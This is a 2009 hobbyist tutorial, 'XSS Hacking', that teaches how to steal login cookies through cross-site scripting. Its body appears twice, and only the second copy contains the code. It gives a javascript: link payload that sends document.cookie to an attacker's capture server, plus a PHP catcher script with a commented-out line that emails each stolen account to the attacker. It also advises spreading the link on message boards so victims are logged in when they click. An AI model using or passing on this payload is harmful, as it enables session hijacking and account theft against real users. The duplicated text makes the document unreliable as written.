Article: XSS Hacking
This is an interesting type of hack because of its simplicity, and the fact that many sites are vulnerable to it. XSS stands for Cross Site Scripting, and has many less nefarious uses. Ad services on web sites commonly use XSS for reporting impressions and click throughs.
But thats no fun, so lets get into the good stuff. We are going to use a simple attack to steal a users active session and possibly their whole account.
First what you need is a target site, your own web server, and a victim. For the purposes of this article a fake site and this web server will serve the first two purposes, and you will serve the last.
Here is the idea in a nut shell, When you log into a web site (Which we will call authenticating from now on) Web Sites store a little piece of data on your local computer. This little piece of data, called a Cookie, is the ONLY way the web server knows that you are you. So if some one else on another computer could have that cookie, the web server would think that they were you as well.
In addition to all that, these cookies sometimes contain even juicier info, like user name, and even some times a password.
Problem is, even though these cookies are always stored on your computer, only the Web Site which created them may look at them, so by nature, they should be safe from other Web Sites getting their secret information. We aim to prove them wrong ;)
SO! Our goal with an XSS attack is to trick the victims computer into sending the Cookie with the secret data to a different server than it is supposed to.
I will describe the attack and why it works, then I will demonstrate it. When you connect to a Web Site it downloads HTML to your computer. That HTML describes to your web browser (IE or FireFox or whatever) what the web page should look like. Because it is now downloaded to your local computer, the web server you downloaded it from has no way of changing it until you click another link or whatever.
The pioneers of the internet thought this sucked. So they created JavaScript. JavaScript is small pieces of code that are downloaded with the HTML and are executed by the Web Browser. The code can do things like change parts of the HTML (like when you put your mouse over an image and it changes? Thats JavaScript).
Now here is the important distinction, because the JavaScript is running locally, on your own computer, it does not have the same restrictions that web servers have, it can access local data however it wants (as long as it is associated with your web browser). Starting to see where Im going with this?
So JavaScript can access the Cookie for the current page it is being executed on!
Now you may ask, but how can we put malicious JavaScript into a page that we have no control over? Ah grasshopper, now you are starting to get it. The answer is, JavaScript injection. You see, a URL ( such as http://www.example.com/ ) is in fact interpreted by the web browser as HTML, and what can be part of HTML? Thats right, JavaScript :)
SO! All we need to do, is write malicious JavaScript code and get it into a victims address bar, how do we do that? Links my friend. Links. Any link you click is sent to the address bar and executed. It could be in an Email, IM, message board, anywhere.
So what we want the Javascript to do is grab the cookie information, thats easy enough:
That will return a string of text containing everything inside the cookie.
Then we want to send that information some where to capture it:
That sends the current document (read, web page) to your special capture server and adds the cookie data along with it.
Last thing to get it all ready is add:
This tells the browser the following text should be executed as javascript.
Next we need to set up the script which will capture the stolen data, this is some very simple PHP:
Notice the code between /* and */ that means that line of code wont execute, because I dont actually want this fake account info, but that shows how easy it would be to have each stolen account emailed to me.
Now lets demo it!
type a fake user name and password in the log in below to create a cooke for us to steal:
Now if you followed it all the way through you should see something like this:
The first line is what we are concerned with. Our fake site stores your log in credentials in the cookie so when you return it can read them and log you in automatically, just like many real pages do in some form or another. Lets break down what we see:
"logon=" the name of the cookie is just logon.
Then you see:
"uname: hi pword: there;"
which is my user name and password:
User Name: hi
Password: there
Pretty simple huh?
Now real sites store your user name and password a bit more securely, so the data stored in their cookies won't look like this probably (god I hope not), but it can still be used to log you in as someone else.
And thats about it!
Now the difficulty with the hack is 2 fold. 1, the person must be at the target site and logged in when they click the link, and 2, you have to get them to click the link.
Both of these problems are usually solved by having the link appear on the site it's self somehow. Say in myspace you could post the link on their message board or something. This way they are definitely logged in at the site when they click it.
This method comes with some issues however because a lot of sites filter for JavaScript. And of course there are more methods to defeat filters, and even methods to get the code to execute without even being clicked. The war between defender and attacker goes on.
But you want to know the quickest way to defeat this attack? Look at the URL of a link before you click it!
Anyway, I hope you enjoyed this, happy hacking!
- Adam
But thats no fun, so lets get into the good stuff. We are going to use a simple attack to steal a users active session and possibly their whole account.
First what you need is a target site, your own web server, and a victim. For the purposes of this article a fake site and this web server will serve the first two purposes, and you will serve the last.
Here is the idea in a nut shell, When you log into a web site (Which we will call authenticating from now on) Web Sites store a little piece of data on your local computer. This little piece of data, called a Cookie, is the ONLY way the web server knows that you are you. So if some one else on another computer could have that cookie, the web server would think that they were you as well.
In addition to all that, these cookies sometimes contain even juicier info, like user name, and even some times a password.
Problem is, even though these cookies are always stored on your computer, only the Web Site which created them may look at them, so by nature, they should be safe from other Web Sites getting their secret information. We aim to prove them wrong ;)
SO! Our goal with an XSS attack is to trick the victims computer into sending the Cookie with the secret data to a different server than it is supposed to.
I will describe the attack and why it works, then I will demonstrate it. When you connect to a Web Site it downloads HTML to your computer. That HTML describes to your web browser (IE or FireFox or whatever) what the web page should look like. Because it is now downloaded to your local computer, the web server you downloaded it from has no way of changing it until you click another link or whatever.
The pioneers of the internet thought this sucked. So they created JavaScript. JavaScript is small pieces of code that are downloaded with the HTML and are executed by the Web Browser. The code can do things like change parts of the HTML (like when you put your mouse over an image and it changes? Thats JavaScript).
Now here is the important distinction, because the JavaScript is running locally, on your own computer, it does not have the same restrictions that web servers have, it can access local data however it wants (as long as it is associated with your web browser). Starting to see where Im going with this?
So JavaScript can access the Cookie for the current page it is being executed on!
Now you may ask, but how can we put malicious JavaScript into a page that we have no control over? Ah grasshopper, now you are starting to get it. The answer is, JavaScript injection. You see, a URL ( such as http://www.example.com/ ) is in fact interpreted by the web browser as HTML, and what can be part of HTML? Thats right, JavaScript :)
SO! All we need to do, is write malicious JavaScript code and get it into a victims address bar, how do we do that? Links my friend. Links. Any link you click is sent to the address bar and executed. It could be in an Email, IM, message board, anywhere.
So what we want the Javascript to do is grab the cookie information, thats easy enough:
Code: Javascript
document.cookie
That will return a string of text containing everything inside the cookie.
Then we want to send that information some where to capture it:
Code: Javascript
document.location='http://www.someserver.com/capture.php?cookie='+document.cookie
That sends the current document (read, web page) to your special capture server and adds the cookie data along with it.
Last thing to get it all ready is add:
Code: Javascript
javascript: document.location= 'http://www.someserver.com/capture.php?cookie='+document.cookie
This tells the browser the following text should be executed as javascript.
Next we need to set up the script which will capture the stolen data, this is some very simple PHP:
Code: PHP
All I do here is check if the cookie data was sent, and if it was, I print it to the screen.
<?php
if( isset( $_GET['cookie'] ) ) {
print_r( $_GET['cookie'] );
/* mail( 'youremail@somewhere.com',
'Another account captured!',
$_GET['cookie'] ); */
}
?>
Notice the code between /* and */ that means that line of code wont execute, because I dont actually want this fake account info, but that shows how easy it would be to have each stolen account emailed to me.
Now lets demo it!
type a fake user name and password in the log in below to create a cooke for us to steal:
Now if you followed it all the way through you should see something like this:
Example Cookie Contents:
logon=uname: hi pword: there; PHPSESSID=15164d29cf8b085c95d8cf6554ca7739
The first line is what we are concerned with. Our fake site stores your log in credentials in the cookie so when you return it can read them and log you in automatically, just like many real pages do in some form or another. Lets break down what we see:
"logon=" the name of the cookie is just logon.
Then you see:
"uname: hi pword: there;"
which is my user name and password:
User Name: hi
Password: there
Pretty simple huh?
Now real sites store your user name and password a bit more securely, so the data stored in their cookies won't look like this probably (god I hope not), but it can still be used to log you in as someone else.
And thats about it!
Now the difficulty with the hack is 2 fold. 1, the person must be at the target site and logged in when they click the link, and 2, you have to get them to click the link.
Both of these problems are usually solved by having the link appear on the site it's self somehow. Say in myspace you could post the link on their message board or something. This way they are definitely logged in at the site when they click it.
This method comes with some issues however because a lot of sites filter for JavaScript. And of course there are more methods to defeat filters, and even methods to get the code to execute without even being clicked. The war between defender and attacker goes on.
But you want to know the quickest way to defeat this attack? Look at the URL of a link before you click it!
Anyway, I hope you enjoyed this, happy hacking!
- Adam
Copy Right Adam Brown 2009